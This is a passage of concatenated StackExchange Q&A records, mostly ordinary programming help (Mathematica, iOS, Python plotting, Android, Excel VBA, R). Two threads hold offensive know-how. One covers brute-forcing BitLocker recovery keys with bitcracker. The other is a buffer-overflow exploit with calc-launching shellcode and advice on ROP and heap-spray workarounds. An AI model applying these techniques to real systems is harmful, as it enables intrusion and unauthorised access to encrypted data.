odebc1, odebc2}, {Outer[G, grid, grid], \n f \/@ grid}, {t, 0, T}];\n\nsolG = rebuild[sol[[1]], {grid, grid}, 3];\nsolf = rebuild[sol[[2]], grid, 2];\n<\/code>\nLet's check the solution:\n<code>Manipulate[Plot3D[solG[x, y, t] \/\/ Evaluate , {x, ##}, {y, ##}, \n PlotRange -> {-0.1, 1}], {t, 0, T}] & @@ domain\n<\/code>\n\n<code>Manipulate[Plot[solf[x, t] \/\/ Abs \/\/ Evaluate, {x, ##}, PlotRange -> {0, 0.2}], {t, 0, \n T}] & @@ domain\n<\/code>\n\nIf you prefer periodic b.c.:\n<code>ptoofunc1 = pdetoode[{G, f, f2}[x, y, t], t, {grid, grid}, difforder, True];\nptoofunc2 = pdetoode[{G2, f}[x, t], t, grid, difforder, True];\n \node1 = ptoofunc1@eq1 \/. rule1;\node2 = ptoofunc2@eq2 \/. 
rule2;\nodeic1 = ptoofunc1@ic1;\nodeic2 = ptoofunc2@ic2;\n\nsol = NDSolveValue[{ode1, ode2, odeic1, odeic2}, {Outer[G, grid, grid], f \/@ grid}, {t, \n 0, T}];\n\nsolG = rebuild[sol[[1]], {grid, grid}, 3];\nsolf = rebuild[sol[[2]], grid, 2];\n<\/code>\nAnswer: Well from the link below DSolve , in this stage of development can only handle 2 independent variables. \nhttp:\/\/reference.wolfram.com\/language\/tutorial\/DSolveIntroductionToPDEs.html\nComment: Thanks for the info. Do you know if the same limit applies to NDSolve? I could not find anything in the the documentation.\n","meta":{"source":"mathematica.stackexchange","title":"Solving systems of partial differential equations with functions of different number of variables","dup_signals":{}},"subset":"stackexchange"} +{"text":"App crashes when trying to access a viewcontroller from AppDelegate\n\nQuestion: This is how I am trying to get my PlayersViewController:\n<code>UITabBarController *tabBarController = (UITabBarController*)self.window.rootViewController;\nUINavigationController *navigationController = [tabBarController viewControllers][0];\nPlayersViewController *playersViewController = [navigationController viewControllers][0];\n<\/code>\nThe app crashes after the 3rd line with the following error:\n<code>Terminating app due to uncaught exception 'NSInvalidArgumentException', reason: '-[UIViewController viewControllers]: unrecognized selector sent to instance 0x715b290'\n<\/code>\nI am new to IOS programming so I can't figure out what the problem is. I am not getting my PlayersViewController correct ? Here is the image with my storyboard.\nComment: Navigation Controller doesn't have the views added to it yet by the looks of it.\nComment: @FaddishWorm: And how can I do this ?\nAnswer: The <code>UINavigationController<\/code> that contains the <code>PlayersViewController<\/code> controller is at index 1 in the tab bar controller's <code>viewControllers<\/code> array. The indexing is from left to right, that is, the leftmost tab has index 0. The \"Players\" tab is to the right of the \"Gestures\", and the tab bar has two items, so therefore the view controller associated with that tab index is at index 1.\nThe message you are seeing is because at index 0 there is a <code>UIViewController<\/code> instance corresponding with the label \"View Controller - Gestures\" in your storyboard, and you are trying to send it a message that <code>UIViewController<\/code> does not respond to, in the belief that it is a <code>UINavigationController<\/code>.\n","meta":{"source":"stackoverflow","title":"App crashes when trying to access a viewcontroller from AppDelegate","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to label cluster after applying to k-mean clustering to dataset?\n\nQuestion: I have a dataset in .csv format which looks like this -\ndata\n<code>x,y,z, label\n2,1,3, A\n5,3,1, B\n6,2,2, C\n9,5,3, B\n2,3,4, A\n4,1,4, A\n\n<\/code>\nI would like to apply k-mean clustering to the above dataset. As we see above the 3 dimension dataset(x-y-z). And after that, I would like to visualize the clustering in 3-dimension with a specific cluster label in diagram. 
Please let know if you need more details.\nI have used for 2-dimension dataset as see below -\n<code>kmeans_labels = cluster.KMeans(n_clusters=5).fit_predict(data)\n\n<\/code>\nAnd plot the visualize for 2-dimension dataset,\n<code>plt.scatter(standard_embedding[:, 0], standard_embedding[:, 1], c=kmeans_labels, s=0.1, cmap='Spectral');\n<\/code>\nSimilarly, I would like to plot 3-dimension clustering with label. Please let me know if you need more details.\nAnswer: Could something like that be a good solution?\n<code>import numpy as np\nfrom sklearn.cluster import KMeans\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndata = np.array([[2,1,3], [5,3,1], [6,2,2], [9,5,3], [2,3,4], [4,1,4]])\n\ncluster_count = 3\nkm = KMeans(cluster_count)\nclusters = km.fit_predict(data)\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nscatter = ax.scatter(data[:, 0], data[:, 1], data[:, 2], c=clusters, alpha=1)\n\nlabels = [\"A\", \"B\", \"C\"]\nfor i, label in enumerate(labels):\n ax.text(km.cluster_centers_[i, 0], km.cluster_centers_[i, 1], km.cluster_centers_[i, 2], label)\n\nax.set_title(\"3D K-Means Clustering\")\nax.set_xlabel(\"x\")\nax.set_ylabel(\"y\")\nax.set_zlabel(\"z\")\nplt.show()\n<\/code>\n\nEDIT\nIf you want a legend instead, just do this:\n<code>import numpy as np\nfrom sklearn.cluster import KMeans\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\ndata = np.array([[2,1,3], [5,3,1], [6,2,2], [9,5,3], [2,3,4], [4,1,4]])\n\ncluster_count = 3\nkm = KMeans(cluster_count)\nclusters = km.fit_predict(data)\n\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\nscatter = ax.scatter(data[:, 0], data[:, 1], data[:, 2], c=clusters, alpha=1)\n\nhandles = scatter.legend_elements()[0]\nax.legend(title=\"Clusters\", handles=handles, labels = [\"A\", \"B\", \"C\"])\n\nax.set_title(\"3D K-Means Clustering\")\nax.set_xlabel(\"x\")\nax.set_ylabel(\"y\")\nax.set_zlabel(\"z\")\nplt.show()\n<\/code>\nComment: So you want a...legend! XD I've just edited my answer!\nComment: Do you mean the number of clusters? Look at the `cluster_count` variable.\nComment: `fig = plt.figure(figsize=(16, 12))`\nComment: Do you know moveable figure in all 3d? Because of this image, I can't see the cluster hidden inside.\nComment: sorry, your question is not clear to me. Can you rephrase it please? Thanks.\nComment: Does rotating the figure help?\nComment: so, has the issue been solved now?\nComment: Try `scatter = ax.scatter(data[:, 0], data[:, 1], data[:, 2], c=clusters, alpha=0.3)`\nComment: So, post a new question on SO about this issue, please. Thanks.\nComment: Is something not ok with this answer? Thanks.\n","meta":{"source":"stackoverflow","title":"How to label cluster after applying to k-mean clustering to dataset?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How would I brute-force a Bitlocker recovery key?\n\nQuestion: I have imaged a hard disk and used passware, but to no avail - it says Encryption key External key, and not the actual key.\nHow do you think I would go about brute forcing it? 
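As a side note to the k-means labelling discussion above: if the goal is to name the discovered clusters after the letter labels already present in the data, rather than only annotating the plot, a common approach is a per-cluster majority vote. A minimal sketch, reusing the question's toy data (the mapping is only meaningful when the clusters roughly follow the labels):\n<code>import numpy as np\nfrom collections import Counter\nfrom sklearn.cluster import KMeans\n\n# toy data and labels as in the question's csv\ndata = np.array([[2,1,3], [5,3,1], [6,2,2], [9,5,3], [2,3,4], [4,1,4]])\nlabels = np.array(['A', 'B', 'C', 'B', 'A', 'A'])\n\nclusters = KMeans(n_clusters=3, n_init=10, random_state=0).fit_predict(data)\n\n# name each cluster after the most frequent original label inside it\ncluster_names = {c: Counter(labels[clusters == c]).most_common(1)[0][0]\n                 for c in np.unique(clusters)}\nprint([cluster_names[c] for c in clusters])\n<\/code>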
Lets assume I had infinite time, what software(s) could I use for this?\nIm quite interested in the concept and would like to test it on a drive I locked with TPM and a PIN, so any pointers from here would be useful and much appreciated.\nThanks in advance...\nAnswer: Well you have to brute-force the 48 character recovery key (https:\/\/blogs.msdn.microsoft.com\/si_team\/2006\/08\/10\/bitlocker-recovery-password-details\/)\nAs I remember it visually shown when 6 character sub-key is successfully entered so I guess it is possible but if there are tools available I'm unaware of. \nGood luck\nComment: Thanks for that info - do you know specifically what software I could use to automate this for me?\n\nI.e. Passware Kit forensic supports Hardware Acceleration, but for unknown reasons its not working for me..\nComment: The visual notification is based on a simple checksum (I believe it had something to do with sums of alternating digits matching or something) to help prevent typos, it does not store any partial key data that can be used to crack the key. Actually, the details for it are in that page you linked. It checks for divisibility by 11.\nAnswer: You can use bitcracker. This tool was developed for that, for brute forcing BitLocker recovery key or user password.\nBitcracker performs a dictionary attack, so you still need to create a list of possible recovery keys. And you should be careful with creating such kind of list because there are special conditions for recovery key (look through this paper, chapter 5.4, for details or Microsoft documentation).\nAnswer: https:\/\/docs.microsoft.com\/en-us\/archive\/blogs\/si_team\/bitlocker-recovery-password-details\nsays\n\nWhen a user is entering the key, we accept it 6 digits at a time, and\nthen check to see if the number they just entered is exactly divisible\nby 11. If it is then we know it might form part of the key - if it\ndoesn't then we know for sure it isn't a valid block. This guards\nagainst swapped digits, mis-entered numbers, etc, and we can safely\nreport the entry error to the user.\nBut does this check reduce the amount of work an attacker would have\nto do to brute force the underlying key? Consider that when we check a\ngroup of digits we aren't saying that they are the 'correct' group for\nthat location in the key - merely that they could be a correct group,\nas they are divisible by 11.\n\nIts just to help the user that its probably the correct sequence, it could still be wrong.\n","meta":{"source":"security.stackexchange","title":"How would I brute-force a Bitlocker recovery key?","dup_signals":{}},"subset":"stackexchange"} +{"text":"pyhamcrest - Compare two list\n\nQuestion: I've just started learning python. 
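To make the BitLocker recovery-password structure discussed above concrete: the 48-digit password is entered as eight 6-digit groups, and the quoted check only says a group must be divisible by 11. Below is a minimal Python sketch of the validity test an enumerator would apply to candidate groups; the extra bound that each group divided by 11 must fit in 16 bits is my reading of the recovery-password format referenced in the answers, so treat it as an assumption:\n<code>def plausible_block(block: str) -> bool:\n    # a candidate 6-digit group must be a multiple of 11 and, divided by 11,\n    # fit in 16 bits (assumed bound, per the format notes referenced above)\n    if len(block) != 6 or not block.isdigit():\n        return False\n    n = int(block)\n    return n % 11 == 0 and n \/\/ 11 <= 0xFFFF\n\ndef plausible_password(pw: str) -> bool:\n    groups = pw.split('-')\n    return len(groups) == 8 and all(plausible_block(g) for g in groups)\n\nprint(plausible_block('123456'))  # False: not divisible by 11\nprint(plausible_block('123453'))  # True: 123453 == 11 * 11223\n<\/code>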
Currently writing a unit test to assert if the elements in the expected list is present in the actual list\n<code>def test_compare_list_of_items():\n actual_list_of_items = ['a','b']\n expected_list_of_items = ['a']\n\n assert_that(actual_list_of_items, has_item(has_items(expected_list_of_items))) \n<\/code>\nbut i'm getting errors like\n<code>E Expected: a sequence containing (a sequence containing <['a']>)\nE but: was <['a', 'b']>\n<\/code>\nHow and what sequence matcher should i use in order to assert if item 'a' in the expected list is present in the actual list?\nComment: what is `has_items`?\nComment: `has_items` match if all given items appear in the sequence, in any order https:\/\/github.com\/hamcrest\/PyHamcrest\nComment: sounds like you might be using the wrong function in that library then\nComment: @aws_apprentice - Would appreciate, if you could let me know the right function from the available list.\nAnswer: You are using <code>has_item<\/code> when you should only be using <code>has_items<\/code>. According to the docs this takes multiple matchers which is what you want. Your function then becomes\n<code>def test_compare_list_of_items():\n actual_list_of_items = ['a','b']\n expected_list_of_items = ['a']\n\n assert_that(actual_list_of_items, has_items(*expected_list_of_items))\n<\/code>\nWe use iterable unpacking for the list to feed as the arguments and now when you run it, it shouldn't error out.\nComment: Thanks! I tried that earlier but it doesn't work: ```def test_compare_list_of_items():\n actual_list_of_items = ['a','b']\n expected_list_of_items = ['a']\n> assert_that(actual_list_of_items, has_items(expected_list_of_items))\nE AssertionError:\nE Expected: (a sequence containing <['a']>)\nE but: a sequence containing <['a']> was <['a', 'b']>```\nComment: you're missing the `*`, please copy my answer directly how it is, the issue is that you aren't _unpacking_ the list, note the `*` directly in front of `expected_list_of_items`\nComment: Oh ok! Thanks a lot @aws_apprentice. I read the document again and now i got what you were trying to say above. This helped a lot\nAnswer: I don't know about <code>has_items<\/code> function, but can you just use something like this?\n<code>assertTrue(all(item in expected_list_of_items for item in actual_list_of_items))\n<\/code>\nComment: Thanks Marcos! I do have a work around but i want to use pyhamcrest matchers and hence the question. 
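To make the star-unpacking point from the accepted PyHamcrest answer above concrete, here is a minimal, self-contained sketch (no test runner needed):\n<code>from hamcrest import assert_that, has_items\n\nactual = ['a', 'b']\nexpected = ['a']\n\n# without unpacking, the whole list is treated as ONE expected element,\n# so the matcher looks for the element ['a'] inside ['a', 'b'] and fails:\n# assert_that(actual, has_items(expected))  # would raise AssertionError\n\n# with unpacking, each element of the list becomes its own matcher argument\nassert_that(actual, has_items(*expected))  # passes\nprint('ok')\n<\/code>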
Any help would be appreciated\n","meta":{"source":"stackoverflow","title":"pyhamcrest - Compare two list","dup_signals":{}},"subset":"stackexchange"} +{"text":"how take details from a class\n\nQuestion: I have a method that gives me back all the films with a particular word inserted by user.\nNow I want to copy all the details in one list so, when the user clicks a film that the app shows, it shows a toast with the corresponding ID.\n<code>How can i do this?\n\nusing System;\nusing System.Collections.Generic;\nusing System.Linq;\nusing System.Text;\n\nusing Android.App;\nusing Android.Content;\nusing Android.OS;\nusing Android.Runtime;\nusing Android.Views;\nusing Android.Widget;\n\nnamespace App_wrapper\n{\n\n public class Result1\n {\n public int vote_count { get; set; }\n public int id { get; set; }\n public bool video { get; set; }\n public double vote_average { get; set; }\n public string title { get; set; }\n public double popularity { get; set; }\n public string poster_path { get; set; }\n public string original_language { get; set; }\n public string original_title { get; set; }\n public List<int> genre_ids { get; set; }\n public string backdrop_path { get; set; }\n public bool adult { get; set; }\n public string overview { get; set; }\n public string release_date { get; set; }\n }\n\n public class RootObject\n {\n public int page { get; set; }\n public int total_results { get; set; }\n public int total_pages { get; set; }\n public List<Result1> results { get; set; }\n }\n}\n<\/code>\nComment: Took code from link and inserted it into the post instead, also brushed up the grammar a bit\nAnswer: Try this\n<code>Public List<Film> filmList;\n\npublic class Film\n{\n private String title;\n private String id;\n\n public Film(String title, String id)\n {\n this.title = title;\n this.id = id;\n }\n\n public String getId()\n {\n return id;\n }\n\n public override string ToString()\n {\n return title;\n }\n}\n\nforeach (var paolo in toor.results)\n{\n var fItem=new Film{title=paolo.title,id=paolo.id}\n filmList.Add(fItem);\n}\n\nRunOnUiThread(() =>\n{\n adapter = new ArrayAdapter<string>(this, Android.Resource.Layout.SimpleListItem1, filmList);\n lv.Adapter = adapter;\n});\n\n\/\/inside ListView_ItemClick\n\nvar id_film = filmList.ElementAt(e.Position).id;\n<\/code>\nFor reference \nhow to use an ArrayAdapter in android of custom objects\nComment: can i put the public class film inside my main activity? if yes where? inside \"protected override void OnCreate(Bundle savedInstanceState)\"? or after \"before public class dettagli_film : Activity\"\nComment: Don't keep public classes inside Activity. Keep outside where you have your classes like RootObject. I have just given you overview of code.\nComment: ok thanks. I added a new class called film, then i copy Public List filmList; inside the main activity, and the for each inside the main activiy, but i have error in the foreach. i have film, title and id underlined in red, why? it says me that id and title are not accessible due to the level of protection\nComment: Id & title in film class make public. You should think about these little things.\nComment: try this `var fItem=new Film(paolo.title,paolo.id);`\nComment: don't work. the problem now is in paolo.id. Visual studio says that it is impossibile to convert from int to string. But i changed the class Film. id now is an int and not a string EDIT: solved i changed the type of id in the RootObject, now is a string\nComment: now i have a new error in the arrayadapter. 
if i change \"dati\" with \"filmList\" it says me that is impossibile to convert from \"System.Collection.Generic.List in int. Why?\nComment: inside RunOnUiThread make ArrayAdapter to ArrayAdapter. Both side left & right.\nComment: last one error i hope. this is my new main activity https:\/\/pastebin.com\/WfRY8vDu i declered two public string : film and id at the begin of the main activity, but in the string \"var id_film = filmList.ElementAt(e.Position).id;\" i have protection error in id variable. why? EDIT RESOLVED\nComment: if i start my application and press the button \"ricerca film\" i have an exception and the Visual studio program underline this string \"lv.Adapter = adapter;\" why? here the activity https:\/\/pastebin.com\/ipteSs3H\nComment: my app is so composed: in the first activity i have 2 botton. one for search any film , second for search any tv series. If i press the first button, the user enter in the activity of the search and the app crash. it give my this error lv.Adapter=adapter; why? Unhandled Exception:\n\nJava.Lang.NullPointerException: Attempt to invoke interface method 'int java.util.List.size()' on a null object reference\nComment: Ask this question J\"ava.Lang.NullPointerException: Attempt to invoke interface method 'int java.util.List.size()' \" with your related code. People will try to answer. Don't forget to add code with description like this is \"class\", \"this is listClick evet\" etc. Happy coding.\nComment: maybe the problem is the adapter man. i can't do new ArrayAdapter, maybe i have to build a custom adapter. Is it possible?\n","meta":{"source":"stackoverflow","title":"how take details from a class","dup_signals":{}},"subset":"stackexchange"} +{"text":"Hide button on UIWebView when Internet is available\n\nQuestion: I have an iOS 7 app with a <code>UIWebView<\/code>. \nWhen there is no Internet connection I want to add a picture to the web view, along with some text (\"No Internet connection\") as well as a button for refreshing the page. \nI can add the button alright, but it is not hidden when the Internet connection is on. 
I want to hide button text and picture when the device has Internet and hide them when there is no Internet.\nAnswer: I recommend you to use Reachability to track changes between offline\/online (https:\/\/github.com\/tonymillion\/Reachability).\n<code>\/\/ Allocate a reachability object\nReachability* reach = [Reachability reachabilityWithHostname:@\"www.google.com\"];\n\n\/\/ Set the blocks \nreach.reachableBlock = ^(Reachability *reach)\n{\n \/\/ Hide button\n};\n\nreach.unreachableBlock = ^(Reachability *reach)\n{\n \/\/ Show button\n};\n\n\/\/ Start the notifier, which will cause the reachability object to retain itself!\n[reach startNotifier];\n<\/code>\n","meta":{"source":"stackoverflow","title":"Hide button on UIWebView when Internet is available","dup_signals":{}},"subset":"stackexchange"} +{"text":"App crashes when assigning new adapter to my ViewPager\n\nQuestion: I have a <code>ViewPager<\/code> which is populated by a <code>FragmentStatePagerAdapter<\/code> when the app starts:\n<code> ViewPager mViewPager;\n\n ...\n\n @Override\n public void onViewCreated(View view, Bundle savedInstanceState) \n {\n super.onViewCreated(view, savedInstanceState);\n\n mViewPager = (ViewPager) view.findViewById(R.id.viewpager);\n mViewPager.setAdapter(new PageAdapter(getChildFragmentManager()));\n \/\/PageAdapter extends from FragmentStatePagerAdapter\n }\n<\/code>\nThis works fine as it should.\nNow, when the user changes the settings of the app I'd like to assign a new Adapter to the ViewPager like this:\n<code>@Override\npublic void updateObserver(SETTING_KEY key) \n{\n mViewPager.setAdapter(new PageAdapter(getChildFragmentManager()));\n Log.d(\"info\", \"updating\");\n}\n<\/code>\nUnfortunately the app crashes after calling <code>updateObserver<\/code> with this exception:\n\n01-22 23:22:45.957: E\/AndroidRuntime(13131): FATAL EXCEPTION: main\n 01-22 23:22:45.957: E\/AndroidRuntime(13131): java.lang.IllegalStateException: Fragement no longer exists for key f0: index 0\n 01-22 23:22:45.957: E\/AndroidRuntime(13131): at android.support.v4.app.FragmentManagerImpl.getFragment(FragmentManager.java:575)\n 01-22 23:22:45.957: E\/AndroidRuntime(13131): at android.support.v4.app.FragmentStatePagerAdapter.restoreState(FragmentStatePagerAdapter.java:211)\n 01-22 23:22:45.957: E\/AndroidRuntime(13131): at android.support.v4.view.ViewPager.onRestoreInstanceState(ViewPager.java:1281)\n 01-22 23:22:45.957: E\/AndroidRuntime(13131): at android.view.View.dispatchRestoreInstanceState(View.java:13188)\n 01-22 23:22:45.957: E\/AndroidRuntime(13131): at android.view.ViewGroup.dispatchRestoreInstanceState(ViewGroup.java:2850)\n 01-22 23:22:45.957: E\/AndroidRuntime(13131): at android.view.ViewGroup.dispatchRestoreInstanceState(ViewGroup.java:2856)\n 01-22 23:22:45.957: E\/AndroidRuntime(13131): at android.view.View.restoreHierarchyState(View.java:13166)\n 01-22 23:22:45.957: E\/AndroidRuntime(13131): at android.support.v4.app.Fragment.restoreViewState(Fragment.java:425)\n ...\n\nHow do I assign an new Adapter to the <code>ViewPager<\/code> without crashing the app?\nComment: Have you tried this? http:\/\/stackoverflow.com\/questions\/12783571\/android-viewpager-change-adapter\n\nEdit: I see this is from one year ago.\nAnswer: Use getFragmentManager() instead of getChildFragmentManager().\nAnswer: Have you check this thread ?\njava.lang.IllegalStateException: Fragement no longer exists for key f1: index 3\n. 
Use <code>FragmentPagerAdapter<\/code> instead of <code>FragmentStatePagerAdapter<\/code> if you dont care about the Fragment's state restoring when you app go back from background.\n","meta":{"source":"stackoverflow","title":"App crashes when assigning new adapter to my ViewPager","dup_signals":{}},"subset":"stackexchange"} +{"text":"\"unable to set the size property of the font class\" error in Excel VBA for conditional formatting, sheet is NOT protected\n\nQuestion: I have a long VBA macro like this:\n<code>Private Sub ApplyCondFormRun(CellFormat As Range, ValidFormula As String, TargetRange As Range, StopIfTrue As Boolean, Strict As Boolean)\n'For this to work, cell addresses in validation formula must point to the first row\n'of target cell\n\nDim ArrFormat(1 To 9) As Variant\nDim i As Long\n\n'Application.ScreenUpdating = False\n\n'attributes to be copied to destination cells\nWith CellFormat\n ArrFormat(1) = .Font.Color 'Number\n ArrFormat(2) = .Font.Size 'Number\n ArrFormat(3) = .Font.Bold 'Boolean\n ArrFormat(4) = .Font.Italic 'Boolean\n ArrFormat(5) = .Font.Underline 'No: -4142, Single: 2, Double: -4119, Single Accounting: 4, Double Accounting: 5\n If .Interior.ColorIndex = -4142 Then 'If cell is No fill then do nothing\n ArrFormat(6) = .Interior.ColorIndex 'Number\n Else\n ArrFormat(6) = .Interior.Color\n End If\n ArrFormat(7) = .Borders(xlLeft).Color 'Number\n ArrFormat(8) = .Borders(xlLeft).LineStyle 'Use only the left border style of the source cell & apply to whole destination cell\nEnd With\n\n ArrFormat(9) = StopIfTrue 'Boolean\n\nTargetRange.FormatConditions.Add Type:=xlExpression, Formula1:=ValidFormula 'Add new cond formating\nTargetRange.FormatConditions(TargetRange.FormatConditions.Count).SetFirstPriority\nWith TargetRange.FormatConditions(1)\n .Font.Color = ArrFormat(1)\n .Font.Size = ArrFormat(2)\n....\n<\/code>\nThe code stops at <code>.Font.Size = ArrFormat(2)<\/code> line with \"unable to set the size property of the font class\" error. I researched many places, including here, but my sheet is not protected at all.\n\nFYI, the range CellFormat is the first column in the selected range in the photo above. I will apply the formats of these cells to the conditional formats of the destination cells (3rd column).\nFurthermore, the line above it, <code>.Font.Color = ArrFormat(1)<\/code>, ran without problems.\nHere is the screenshot of the error. As u can see font size is 11.\n\nCan somebody help?\nComment: What `Range` are you passing as `CellFormat`? Are you sure `.Font.Size` is not `Null`.\nComment: @BigBen I updated above. Tks for ur comments.\nAnswer: Simple answer: You cannot set the font name or size for conditional formatting. This is not related to <code>VBA<\/code>, but to Excel: If you set a conditional format for a cell using the regular Excel dialog, click the \"format\" button and select the <code>Font<\/code>-Tab, you see that <code>Font<\/code> and <code>Size<\/code> properties are disabled, you cannot select anything there:\n\nFound a good explanation here:\n\nConditional Formatting cannot do what you want, because it is meant to only give the appearance format changes, not really change the properties of cells. Different fonts have different styles and spacing. The presumption is that a larger size font would force the width of the column or height of the row to be changed, which would be a change to the worksheet object environment, which Conditional Formatting cannot do. 
If you want the font style to change you'd need to do it yourself or employ VBA\n","meta":{"source":"stackoverflow","title":"\"unable to set the size property of the font class\" error in Excel VBA for conditional formatting, sheet is NOT protected","dup_signals":{}},"subset":"stackexchange"} +{"text":"Shellcode not executing despite EIP being overwritten properly\n\nQuestion: Here is my exploit:\n<code>junk = b'A' * 1032\n\u200b\neip = b\"\\xf5\\x93\\x4a\\x00\" # some address where 'jmp esp' lives\n\nshellcode = b\"\"\nshellcode += b\"\\x33\\xc0\" # xor eax, eax\nshellcode += b\"\\x50\" # push eax\nshellcode += b\"\\x68\\x2E\\x65\\x78\\x65\" # push \".exe\"\nshellcode += b\"\\x68\\x63\\x61\\x6C\\x63\" # push \"calc\"\nshellcode += b\"\\x8B\\xC4\" # mov eax, esp\nshellcode += b\"\\x6A\\x01\" # push 1\nshellcode += b\"\\x50\" # push eax\nshellcode += b\"\\xBB\\x30\\xCD\\x07\\x77\" # mov ebx, 7707cd30 (location of winexec)\nshellcode += b\"\\xFF\\xD3\" # call ebx\n\u200b\nnopsled = b\"\\x90\" * 30\n\u200b\nwith open(\"exploit.txt\", \"wb\") as file:\n file.write(junk + eip + nopsled + shellcode)\n<\/code>\nEIP gets overwritten with the correct value, but it doesn't jump to the shellcode, is there something I am missing? I also tried with shellcode generated by <code>msfvenom<\/code> and it didn't work as well, so I think the problem is not the shellcode itself. I am 99% sure the problem is the <code>\\x00<\/code> from the EIP, but how can I omit it if the address of <code>jmp esp<\/code> contains it? There is no <code>jmp esp<\/code> in the binary without a leading <code>\\x00<\/code>.\nAnswer: You are right, the problem is the <code>\\x00<\/code> in <code>EIP<\/code>. This is commonly known as a bad character, you can find more bad chars here.\nTo bypass this issue, you need to use gadgets (Return-Oriented Programing) to jump to <code>ESP<\/code>, for example:\n<code>0x11223344 mov eax, esp\n...\nret\n<\/code>\nAnd a second gadget that jump to <code>EAX<\/code>:\n<code>0x55667788 jmp eax\n...\nret\n<\/code>\nIn this case, the final exploit should be:\n<code>with open(\"exploit.txt\", \"wb\") as file:\n file.write(junk + b\"\\x44\\x33\\x22\\x11\" + b\"\\x88\\x77\\x66\\x55\" + nopsled + shellcode)\n<\/code>\nComment: What if all the ROPs' addresses contain 00?\nAnswer: While using ROP is a viable option, you don't have to use ROP. There are several viable options:\n\nUse gadgets from a different .dll\/.so library with a better base address\nUse a relative jmp: <code>jmp esp-8<\/code> and shift your payload by 8 bytes\nUse a long NOP sled and jump to a fixed stack address which is hopefully within your NOP sled\nIf you control several registers load a pre-calculated address into say eax and use a gadget like <code>sub eax-48;call eax<\/code> to pivot to the <code>jmp esp<\/code> address\nSpray the heap and overwrite EIP to a fixed address like <code>0x0c0c0c0c<\/code>\nPut the payload in the junk portion of your payload and find a gadget that increments esp enough to hit inside your junk space then returns. This way you can use a partial overwrite of the address leaving the largest byte with its original value. 
Given that you're overwriting a return address, there is a chance it already contained <code>0x004a????<\/code>\n\nThere are many ways to solve these corner cases and getting creative is certainly allowed.\n","meta":{"source":"security.stackexchange","title":"Shellcode not executing despite EIP being overwritten properly","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why is the Service Unavailable Error using Lapply?\n\nQuestion: I am using the spotifyr library where I want to find audio features for multiple tracks. For example, I can do this in order to find the audio features of a specific song using its id.\n<code>analysis2 <- get_track_audio_features(\"2xLMifQCjDGFmkHkpNLD9h\", \n                                      authorization = get_spotify_access_token())\n<\/code>\nYesterday, I wrote this function below that takes all the tracks in a dataframe, finds the audio features for all of them and stores them in a list, and it was working fine.\n<code>get_analysis <- function(track_id)\n{\n  analysis <- get_track_audio_features(track_id, \n                                       authorization = get_spotify_access_token()) \n}\n\ntracks_list <- lapply(all_tracks$track.id, get_analysis)\n<\/code>\nNow I am getting an error saying Request failed [503] and Error in get_track_audio_features(track_id, authorization = get_spotify_access_token()) : Service Unavailable (HTTP 503).\nI am still able to find the audio features of a specific song, so I am not sure which service is unavailable.\nAnswer: I suspect you are reaching a song in your data for which the response is denied from Spotify. You could try adding an error-catching mechanism to see which one it is:\n<code>get_analysis <- function(track_id){\n  tryCatch(\n    expr = {\n      get_track_audio_features(track_id, authorization = get_spotify_access_token())\n    }, \n    error = function(e){\n      print(track_id)\n    }) -> analysis\n  return(analysis)\n}\n\ntracks_list <- lapply(all_tracks$track.id, get_analysis) \n<\/code>\nI looked at the source code for the package and didn't see any sneaky rate-limiting issues, and the Web API page shows error 503 as a generic error that needs waiting to be resolved (https:\/\/developer.spotify.com\/documentation\/web-api\/). Thus you could also try just adding a 10 minute wait (I couldn't find how long exactly it is on Spotify's website):\n<code>get_analysis <- function(track_id){\n  tryCatch(\n    expr = {\n      get_track_audio_features(track_id, authorization = get_spotify_access_token()) -> output\n      return(output)\n    }, \n    error = function(e){\n      print(track_id)\n      return(e)\n    }) -> output\n}\n\nwait.function <- function(){\n  Sys.sleep(600)\n}\n\nget_analysis_master <- function(all_tracks){\n  k <- 1\n  tracks_list <- list()\n  for(track.id in all_tracks$track.id){\n    get_analysis(track.id) -> output\n    if(!inherits(output, \"error\")){\n      tracks_list[[k]] <- output\n      k <- k + 1\n    } else {\n      # the failing id was printed inside get_analysis; wait, then move on\n      wait.function()\n    }\n  }\n  return(tracks_list)\n}\n\nget_analysis_master(all_tracks) -> tracks_list\n<\/code>\n","meta":{"source":"stackoverflow","title":"Why is the Service Unavailable Error using Lapply?","dup_signals":{}},"subset":"stackexchange"} +{"text":"PHP Webhost Operation Checking\n\nQuestion: I want to perform a check whenever an update function runs against the PHP web host: if everything went fine, send a notification and let the application know the operation succeeded. 
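The wait-and-retry idea from the R answer above is language-neutral; here is a minimal Python sketch of the same pattern, where <code>fake_fetch<\/code> is a stand-in for the real API call (it is not part of spotifyr) and the 503 failure is simulated:\n<code>import time\n\ndef with_retries(fetch, track_id, max_tries=5, wait_seconds=600):\n    # generic wait-and-retry wrapper; `fetch` is any callable that raises on HTTP 503\n    for attempt in range(1, max_tries + 1):\n        try:\n            return fetch(track_id)\n        except RuntimeError as err:  # stand-in for an HTTP 503 failure\n            print(f'attempt {attempt} for {track_id} failed: {err}')\n            if attempt == max_tries:\n                raise\n            time.sleep(wait_seconds)\n\n# tiny demo with a fake fetcher that fails twice, then succeeds\ncalls = {'n': 0}\ndef fake_fetch(track_id):\n    calls['n'] += 1\n    if calls['n'] < 3:\n        raise RuntimeError('Service Unavailable (HTTP 503)')\n    return {'id': track_id, 'danceability': 0.5}\n\nprint(with_retries(fake_fetch, '2xLMifQCjDGFmkHkpNLD9h', wait_seconds=0))\n<\/code>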
